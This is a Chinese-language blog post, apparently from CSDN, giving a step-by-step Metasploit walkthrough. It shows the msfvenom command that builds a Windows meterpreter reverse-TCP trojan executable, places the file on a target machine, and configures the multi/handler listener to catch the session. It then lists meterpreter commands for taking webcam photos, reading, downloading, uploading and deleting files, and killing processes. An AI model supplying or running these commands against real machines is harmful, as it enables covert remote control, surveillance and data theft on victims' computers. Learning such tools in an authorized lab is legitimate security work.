【工具使用】——Metasploit(MSF)使用详解(超详细)_剑客 getshell的博客-CSDN博客
首先两台设备需要ping通
木马生成:
1 2 3 4 5
| - sudo su - msfconsole
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<本地ip(kali)> LPORT=<本地端口号(随便写)> –f exe –o <文件名>.exe
|
在根目录下找到该文件,放在靶机上 192.168.81.93
设置参数
1 2 3 4 5 6 7 8 9
| msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf5 exploit(multi/handler) > set lhost 192.168.43.238(kali ip,桥接模式) lhost => 192.168.81.93 msf5 exploit(multi/handler) > set lport 20004(刚刚自己设置的端口) lport => 20004 msf5 exploit(multi/handler) > exploit -z -j(后台执行)
|
接下来在靶机执行木马程序
1 2 3
| msf exploit(handler) > sessions(查看上钩的用户)
msf exploit(handler) > sessions -i 1(选择需要攻击的用户,这里选择第 1 个)
|
出现meterpreter >让你输入就是成功控制了(这玩意提权也行)
看帮助文档,命令help
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26
| cmd指令: webcam_snap 拍照片
cat 读取文件内容到屏幕 cd 更改目录 checksum 检索文件的校验和 cp 将源复制到目标 del 删除指定文件 dir 列出文件(ls 的别名) 下载 下载文件或目录 编辑 编辑文件 getlwd 打印本地工作目录 getwd 打印工作目录 lcd 更改本地工作目录 lls 列出本地文件 lpwd 打印本地工作目录 ls 列出文件 mkdir 创建目录 mv 将源移动到目标 pwd 打印工作目录 rm 删除指定文件 rmdir 删除目录 search 搜索文件 show_mount 列出所有挂载点/逻辑驱动器 upload 上传文件或目录 pkill 按名称终止进程
|